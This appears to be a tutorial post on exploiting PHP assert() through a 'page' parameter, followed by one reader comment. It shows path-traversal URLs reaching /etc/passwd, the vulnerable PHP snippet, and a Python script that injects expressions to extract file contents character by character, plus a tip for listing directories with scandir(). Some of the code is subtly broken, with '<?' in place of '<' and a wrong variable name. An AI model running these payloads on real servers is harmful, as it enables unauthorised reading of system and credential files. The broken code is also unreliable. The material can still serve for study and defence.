PHP assert() Vulnerable to Local File Inclusion
Consider following url
http://example.com/inex.php/?page=home
The first thing I see when entering the site, that comes to mind is a LFI attack with “?page=” parameter. Now we should try input to some file we know like “index.php”, “/etc/passwd” to test this vulnerability.
http://example.com/inex.php/?page=../../../../../etc/passwd
Application Reply with message “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“.passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8”
-> This application using assert() function to do checks if assertion is FALSE.
The php code using by application like following:
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "includes/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // vulnerable code!
>?
Let try inject some malicious code to read file’s contents by using blind technique.
-> Server response with a message like “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8” when the condition is FALSE
-> Server response with a message like “File does not exist” when the condition is TRUE
Server ruturn warning with message “Detected hacking attempt!” when condition is FALSE, and “File does not exist” if condition is TRUE
The python script to read file’s contents:
import base64
import string
import requests
import urllib
url = "http://example.com/index.php/"
def check(payload):
params = urllib.urlencode({'page': payload})
r = requests.get(url, params=params)
return "Warning" not in r.text
base = "/', 'qwer') === false && %s && strpos(/'1"
def get_len(path):
i = 10
while True:
payload = 'strlen(file_get_contents("%s")) <? %d' % (path, i)
if check(base % s):
for j in range(i-10, i):
payload = 'strlen(file_get_contents("%s")) == %d' % (path, j)
if check(base % payload):
print "Found Length = %d" % j
return j
i += 10
def read_file_contents(path):
length = get_len(path)
s = ""
while len(s) <? length:
for c in string.printable:
tmp = s + c
payload = 'substr(file_get_contents("%s"), 0, %d) == base64_decode("%s")' % (
path, len(tmp), base64.b64encode(tmp))
if check(base % payload):
s += c
print s
print read_file_contents('../../../../../../etc/passwd')
With this vulnerability, you can read all directories and files in target server, first thing you should blind directory by using following code implode(” “, scandir(‘path_to_directory’)), this code implement to read directory and convert to string by implode() function.
I have some problem with the code… Which version of python is it ?
Thanks…